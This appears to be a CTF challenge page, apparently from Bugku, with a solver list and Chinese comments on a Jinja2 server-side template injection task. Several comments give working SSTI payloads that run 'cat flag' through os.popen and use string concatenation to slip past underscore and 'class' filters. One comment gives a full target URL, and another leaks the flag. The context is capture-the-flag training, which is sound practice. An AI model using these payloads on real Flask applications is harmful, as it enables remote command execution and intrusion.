评分(0)
暂无评分
解题动态
18096199839 攻破了该题 8天前
WJaosn 攻破了该题 16天前
Zfc 攻破了该题 20天前
xxggjj11 攻破了该题 22天前
ksw0513 攻破了该题 1月前
houguan 攻破了该题 1月前
DangerHe 攻破了该题 1月前
hhhh1213 攻破了该题 1月前
HamiLemon 攻破了该题 1月前
lalala2022 攻破了该题 1月前
kuku1024 攻破了该题 2月前
orr_ 攻破了该题 2月前
xujunjjj 攻破了该题 2月前
un 攻破了该题 2月前
devilrun 攻破了该题 3月前
mr.zhao 攻破了该题 3月前
huangwj 攻破了该题 3月前
lizhibin 攻破了该题 3月前
3xsh0re 攻破了该题 3月前
评论
r1ng_13 3月前
举报
找到注入点,分镜直接秒
nakanodarling 1年前
举报
fenjing
yaozhiwang 1年前
举报
0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}
xiaobai568 2年前
举报
wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html
WCRH 2年前
举报
首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)
单手压FL 2年前
举报
search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
jz1111 2年前
举报
http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
2728462336 2年前
举报
爆出传参search,利用字符串拼接绕过